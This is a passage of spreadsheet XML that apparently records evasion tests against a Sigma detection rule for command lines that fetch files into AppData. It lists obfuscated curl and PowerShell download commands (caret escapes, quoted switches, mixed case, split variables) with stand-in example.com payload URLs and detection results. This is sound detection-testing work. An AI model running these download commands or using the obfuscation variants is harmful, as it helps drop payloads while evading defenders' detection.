          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D307" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E307" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I307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07" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C308" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D308" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E308" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I308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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C309" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D309" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E309" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I309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09" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C310" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D310" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E310" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I310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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C311" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D311" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E311" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I311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11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C312" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D312" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E312" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C313" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D313" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E313" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I313" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C314" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D314" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E314" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="44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14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C315" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D315" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E315" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="n"/>
      <c r="B316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C316" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D316" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E316" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J316" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C317" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D317" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E317" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="n"/>
      <c r="B318" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C318" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D318" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E318" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J318" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K318" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="43" t="n"/>
      <c r="B319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C319" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D319" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E319" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H319" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I319" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J319" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K319" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="43" t="n"/>
      <c r="B320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C320" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D320" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E320" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H320" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J320" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K320" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="n"/>
      <c r="B321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C321" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D321" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E321" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H321" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C322" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D322" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E322" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="44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322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K322" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="n"/>
      <c r="B323" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C323" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D323" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E323" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J323" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K323" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="n"/>
      <c r="B324" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C324" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D324" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E324" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H324" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J324" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K324" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="n"/>
      <c r="B325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C325" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D325" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E325" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I325" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J325" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K325" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C326" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D326" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E326" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I326" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J326" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K326" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="n"/>
      <c r="B327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C327" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D327" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E327" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I327" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J327" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K327" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="n"/>
      <c r="B328" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C328" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D328" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E328" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I328" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J328" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K328" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="n"/>
      <c r="B329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C329" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D329" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E329" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I329" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J329" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K329" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="n"/>
      <c r="B330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C330" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D330" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E330" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="44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30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K330" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="n"/>
      <c r="B331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C331" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D331" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E331" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G331" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I331" s="43" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters (f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd);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331" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K331" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="n"/>
      <c r="B332" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C332" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
